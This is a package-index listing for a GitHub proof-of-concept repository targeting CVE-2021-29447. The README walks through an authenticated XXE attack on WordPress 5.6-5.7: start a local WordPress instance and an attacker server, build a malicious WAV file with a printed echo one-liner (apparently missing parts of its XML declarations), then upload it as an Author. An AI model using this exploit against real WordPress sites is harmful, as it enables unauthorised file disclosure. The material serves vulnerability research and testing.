Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/motikan2010/CVE-2021-29447
WordPress - Authenticated XXE (CVE-2021-29447)
https://github.com/motikan2010/CVE-2021-29447
Last synced: 3 months ago
JSON representation
WordPress - Authenticated XXE (CVE-2021-29447)
- Host: GitHub
- URL: https://github.com/motikan2010/CVE-2021-29447
- Owner: motikan2010
- Created: 2021-04-16T20:41:26.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2021-10-04T01:13:54.000Z (about 3 years ago)
- Last Synced: 2024-05-20T12:34:58.664Z (6 months ago)
- Language: JavaScript
- Homepage:
- Size: 5.86 KB
- Stars: 41
- Watchers: 2
- Forks: 11
- Open Issues: 2
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - motikan2010/CVE-2021-29447 - WordPress - Authenticated XXE (CVE-2021-29447) (JavaScript)
README
# WordPress 5.6-5.7 - Authenticated (Author+) XXE (CVE-2021-29447)
## Using
### Step1. Run WordPress
```
$ make up-wp
```
### Step2. Run Attacker web server
```
$ make up-mal
```
### Step3. Generate malicious WAV file
#### Without wavefile npm (Recommend)
```
$ echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00%remote;%init;%trick;] >\x00'> malicious.wav
```
#### With wavefile npm
```
$ make make-wav
```
### Step4. Login to WordPress & Upload WAV file to New Media
### Step5. decode
## References
- [WordPress 5.6-5.7 - Authenticated XXE Within the Media Library Affecting PHP 8 Security Vulnerability](https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5)